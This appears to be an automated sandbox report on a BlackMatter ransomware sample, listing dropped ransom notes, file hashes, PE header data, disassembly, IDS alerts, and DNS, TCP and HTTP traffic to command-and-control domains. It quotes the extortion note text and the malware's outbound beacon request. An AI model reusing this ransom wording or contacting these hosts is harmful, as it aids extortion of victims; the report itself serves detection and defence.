              Preview: .....O!R.i.t,...ll.?1...7P....z.6B..]8Q...5...82!..@:..W....S.os1X.a.p..1+.k...Y.....~.......\.....x..2......Z~..#.z5.Hg..|....Iv.".j3.<~......pf.Igy....I...WD..}9!"P.8k!.YJ..R.W.]....h)..m...a.i......w.:....}i.ci.W'~dy........7...k"MA..8XX.\uBY.=~..e...$..............7.}..D..3..D....|...?...4.....".{.h-...S.{.X....^.3"A...9......V.U.N.)..D.CA.......d"wD.g.4PP
              C:\Users\user\Searches\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Videos\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.960122484094687
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.94%
              • Win16/32 Executable Delphi generic (2074/23) 0.02%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:GlLHM7paoZ.exe
              File size:68608
              MD5:598c53bfef81e489375f09792e487f1a
              SHA1:80a29bd2c349a8588edf42653ed739054f9a10f5
              SHA256:22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6
              SHA512:6a82ad5009588d2fa343bef8d9d2a02e2e76eec14979487a929a96a6b6965e82265a69ef8dd29a01927e9713468de3aedd7b5ee5e79839a1a50649855a160c35
              SSDEEP:1536:RzICS4AT6GxdEe+TOdincJXvKv8Zg3kl:qR7auJXSkZg3C
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+.`.....................&....................@..........................@............@................................

              File Icon

              Icon Hash:00828e8e8686b000

              Static PE Info

              General

              Entrypoint:0x40e8d5
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x60FB2BC6 [Fri Jul 23 20:51:18 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:c94b1566bf307396953c849ef18f9857

              Entrypoint Preview

              Instruction
              call 00007FD910E2F037h
              push 00000000h
              call 00007FD910E324B5h
              call 00007FD910E36413h
              call 00007FD910E379DFh
              push 00000000h
              call dword ptr [00411424h]
              call 00007FD910E37BB3h
              call 00007FD910E37BC0h
              call 00007FD910E37BA9h
              call 00007FD910E37B9Eh
              call 00007FD910E37BB7h
              call 00007FD910E37BA0h
              call 00007FD910E37B89h
              call 00007FD910E37B96h
              call 00007FD910E37B97h
              call 00007FD910E37B74h
              call 00007FD910E37B57h
              call 00007FD910E37B5Eh
              call 00007FD910E37B3Bh
              call 00007FD910E37B30h
              call 00007FD910E37B55h
              call 00007FD910E37B3Eh
              call 00007FD910E37B45h
              call 00007FD910E37B3Ah
              call 00007FD910E37B23h
              call 00007FD910E37B06h
              call 00007FD910E37B37h
              call 00007FD910E37B1Ah
              call 00007FD910E37AFDh
              call 00007FD910E37AFEh
              call 00007FD910E37AF9h
              call 00007FD910E37ADCh
              call 00007FD910E37AC5h
              call 00007FD910E37ACCh
              call 00007FD910E37AC1h
              call 00007FD910E37ACEh
              int3
              jmp dword ptr [0040F060h]
              jmp dword ptr [0040F05Ch]
              jmp dword ptr [0040F058h]

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xf1700x50.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x130000x8fc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0xf0700x1c.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0xf0000x70.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xda140xdc00False0.511150568182data6.78775755783IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0xf0000x3d00x400False0.5361328125data4.45330581288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x100000x15ec0x1000False0.881103515625data7.59149156952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc0x120000xda70xe00False0.990792410714data7.90733617332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .reloc0x130000x8fc0xa00False0.78671875data6.42515500113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Imports

              DLLImport
              gdi32.dllSelectPalette, GetTextCharset, GetDeviceCaps, CreateSolidBrush, CreateFontW
              USER32.dllDefWindowProcW, GetClassNameW, GetDlgItem, GetDlgItemTextW, IsDlgButtonChecked, LoadImageW, LoadMenuW, CreateMenu, CreateDialogParamW, EndDialog
              KERNEL32.dllSetLastError, GetModuleHandleA, GetFileAttributesW, GetCommandLineW, GetCommandLineA, FormatMessageW, GetAtomNameW, FreeLibrary

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              10/24/21-09:21:22.789914UDP2033635ET TROJAN BlackMatter CnC Domain in DNS Lookup (paymenthacks .com)5114353192.168.2.38.8.8.8
              10/24/21-09:21:24.275671UDP2033635ET TROJAN BlackMatter CnC Domain in DNS Lookup (paymenthacks .com)5600953192.168.2.38.8.8.8
              10/24/21-09:21:25.235353UDP2033636ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com)5902653192.168.2.38.8.8.8
              10/24/21-09:21:25.279379UDP2033636ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com)4957253192.168.2.38.8.8.8
              10/24/21-09:22:00.454506UDP2033636ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com)5213053192.168.2.38.8.8.8
              10/24/21-09:22:00.484365UDP2033636ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com)5510253192.168.2.38.8.8.8

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 24, 2021 09:21:22.983879089 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:22.983941078 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:22.984102964 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.002027988 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.002079010 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:23.551517010 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:23.551629066 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.552654028 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:23.552732944 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.875174046 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.875211000 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:23.875562906 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:23.875648022 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.879308939 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.879406929 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:23.879421949 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:24.253330946 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:24.253427029 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.253451109 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:24.253474951 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:24.253509045 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.253534079 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.268378019 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.268423080 CEST44349755103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:24.268438101 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.268531084 CEST49755443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.445455074 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.545422077 CEST8049756199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:24.545628071 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.546015024 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.645977974 CEST8049756199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:24.646745920 CEST8049756199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:24.646783113 CEST8049756199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:24.646881104 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.646928072 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.647675991 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.647835016 CEST4975680192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:24.652940989 CEST4975780192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.826159000 CEST8049757103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:24.826378107 CEST4975780192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.826802969 CEST4975780192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:24.826869965 CEST4975780192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:25.000025034 CEST8049757103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:25.024322987 CEST8049757103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:25.024561882 CEST4975780192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:25.024846077 CEST4975780192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:25.026070118 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:25.125961065 CEST8049758199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:25.126168966 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:25.126843929 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:25.198117971 CEST8049757103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:25.226759911 CEST8049758199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:25.227586985 CEST8049758199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:25.227648973 CEST8049758199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:25.227818012 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:25.228332043 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:25.228915930 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:25.328497887 CEST8049758199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:25.328938961 CEST4975880192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:58.955154896 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:58.955194950 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:58.955296993 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:58.956123114 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:58.956131935 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.281089067 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.281276941 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.282322884 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.282331944 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.292777061 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.292809963 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.292853117 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.292871952 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.651822090 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.651932955 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.652000904 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.652312040 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.652333021 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.652349949 CEST44349761103.224.212.222192.168.2.3
              Oct 24, 2021 09:21:59.652355909 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.652431011 CEST49761443192.168.2.3103.224.212.222
              Oct 24, 2021 09:21:59.654660940 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.754874945 CEST8049762199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:59.755049944 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.756165028 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.856501102 CEST8049762199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:59.857633114 CEST8049762199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:59.857670069 CEST8049762199.59.242.153192.168.2.3
              Oct 24, 2021 09:21:59.857742071 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.857789993 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.859530926 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.859585047 CEST4976280192.168.2.3199.59.242.153
              Oct 24, 2021 09:21:59.863253117 CEST4976380192.168.2.3103.224.212.222
              Oct 24, 2021 09:22:00.028317928 CEST8049763103.224.212.222192.168.2.3
              Oct 24, 2021 09:22:00.031991959 CEST4976380192.168.2.3103.224.212.222
              Oct 24, 2021 09:22:00.032787085 CEST4976380192.168.2.3103.224.212.222
              Oct 24, 2021 09:22:00.032906055 CEST4976380192.168.2.3103.224.212.222
              Oct 24, 2021 09:22:00.198172092 CEST8049763103.224.212.222192.168.2.3
              Oct 24, 2021 09:22:00.210882902 CEST8049763103.224.212.222192.168.2.3
              Oct 24, 2021 09:22:00.210921049 CEST8049763103.224.212.222192.168.2.3
              Oct 24, 2021 09:22:00.211030960 CEST4976380192.168.2.3103.224.212.222
              Oct 24, 2021 09:22:00.211272955 CEST4976380192.168.2.3103.224.212.222
              Oct 24, 2021 09:22:00.212445021 CEST4976480192.168.2.3199.59.242.153
              Oct 24, 2021 09:22:00.312573910 CEST8049764199.59.242.153192.168.2.3
              Oct 24, 2021 09:22:00.312813997 CEST4976480192.168.2.3199.59.242.153
              Oct 24, 2021 09:22:00.313380003 CEST4976480192.168.2.3199.59.242.153
              Oct 24, 2021 09:22:00.376547098 CEST8049763103.224.212.222192.168.2.3
              Oct 24, 2021 09:22:00.413425922 CEST8049764199.59.242.153192.168.2.3
              Oct 24, 2021 09:22:00.414448977 CEST8049764199.59.242.153192.168.2.3
              Oct 24, 2021 09:22:00.414489985 CEST8049764199.59.242.153192.168.2.3
              Oct 24, 2021 09:22:00.414582968 CEST4976480192.168.2.3199.59.242.153
              Oct 24, 2021 09:22:00.414695978 CEST4976480192.168.2.3199.59.242.153
              Oct 24, 2021 09:22:00.416101933 CEST4976480192.168.2.3199.59.242.153
              Oct 24, 2021 09:22:00.416167974 CEST4976480192.168.2.3199.59.242.153

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 24, 2021 09:21:22.789913893 CEST5114353192.168.2.38.8.8.8
              Oct 24, 2021 09:21:22.970902920 CEST53511438.8.8.8192.168.2.3
              Oct 24, 2021 09:21:24.275671005 CEST5600953192.168.2.38.8.8.8
              Oct 24, 2021 09:21:24.443306923 CEST53560098.8.8.8192.168.2.3
              Oct 24, 2021 09:21:25.235352993 CEST5902653192.168.2.38.8.8.8
              Oct 24, 2021 09:21:25.268589973 CEST53590268.8.8.8192.168.2.3
              Oct 24, 2021 09:21:25.279378891 CEST4957253192.168.2.38.8.8.8
              Oct 24, 2021 09:21:25.306806087 CEST53495728.8.8.8192.168.2.3
              Oct 24, 2021 09:22:00.454505920 CEST5213053192.168.2.38.8.8.8
              Oct 24, 2021 09:22:00.476039886 CEST53521308.8.8.8192.168.2.3
              Oct 24, 2021 09:22:00.484364986 CEST5510253192.168.2.38.8.8.8
              Oct 24, 2021 09:22:00.505224943 CEST53551028.8.8.8192.168.2.3

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Oct 24, 2021 09:21:22.789913893 CEST192.168.2.38.8.8.80x9d0Standard query (0)paymenthacks.comA (IP address)IN (0x0001)
              Oct 24, 2021 09:21:24.275671005 CEST192.168.2.38.8.8.80x6ddcStandard query (0)ww25.paymenthacks.comA (IP address)IN (0x0001)
              Oct 24, 2021 09:21:25.235352993 CEST192.168.2.38.8.8.80xf7f6Standard query (0)mojobiden.comA (IP address)IN (0x0001)
              Oct 24, 2021 09:21:25.279378891 CEST192.168.2.38.8.8.80x7af9Standard query (0)mojobiden.comA (IP address)IN (0x0001)
              Oct 24, 2021 09:22:00.454505920 CEST192.168.2.38.8.8.80x919aStandard query (0)mojobiden.comA (IP address)IN (0x0001)
              Oct 24, 2021 09:22:00.484364986 CEST192.168.2.38.8.8.80xcb26Standard query (0)mojobiden.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Oct 24, 2021 09:21:22.970902920 CEST8.8.8.8192.168.2.30x9d0No error (0)paymenthacks.com103.224.212.222A (IP address)IN (0x0001)
              Oct 24, 2021 09:21:24.443306923 CEST8.8.8.8192.168.2.30x6ddcNo error (0)ww25.paymenthacks.com77026.bodis.comCNAME (Canonical name)IN (0x0001)
              Oct 24, 2021 09:21:24.443306923 CEST8.8.8.8192.168.2.30x6ddcNo error (0)77026.bodis.com199.59.242.153A (IP address)IN (0x0001)
              Oct 24, 2021 09:21:25.268589973 CEST8.8.8.8192.168.2.30xf7f6Name error (3)mojobiden.comnonenoneA (IP address)IN (0x0001)
              Oct 24, 2021 09:21:25.306806087 CEST8.8.8.8192.168.2.30x7af9Name error (3)mojobiden.comnonenoneA (IP address)IN (0x0001)
              Oct 24, 2021 09:22:00.476039886 CEST8.8.8.8192.168.2.30x919aName error (3)mojobiden.comnonenoneA (IP address)IN (0x0001)
              Oct 24, 2021 09:22:00.505224943 CEST8.8.8.8192.168.2.30xcb26Name error (3)mojobiden.comnonenoneA (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • paymenthacks.com
              • ww25.paymenthacks.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.349755103.224.212.222443C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.349761103.224.212.222443C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.349756199.59.242.15380C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              Oct 24, 2021 09:21:24.546015024 CEST1055OUTGET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953a HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              User-Agent: Chrome/91.0.4472.77
              Cache-Control: no-cache
              Host: ww25.paymenthacks.com
              Cookie: __tad=1635060084.7055840
              Oct 24, 2021 09:21:24.646745920 CEST1056INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 24 Oct 2021 07:21:24 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf; expires=Sun, 24-Oct-2021 07:36:24 GMT; Max-Age=900; path=/; HttpOnly
              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Cdok4ScyBa+/aYmDUVkZ0fEf9O+HjlSrMjDdWvbxkuLSscoGW/4w7hEvNW4M6vmeyFF5TBYRUU/wLEkanH+IHQ==
              Cache-Control: no-cache
              Expires: Thu, 01 Jan 1970 00:00:01 GMT
              Cache-Control: no-store, must-revalidate
              Cache-Control: post-check=0, pre-check=0
              Pragma: no-cache
              Content-Encoding: gzip
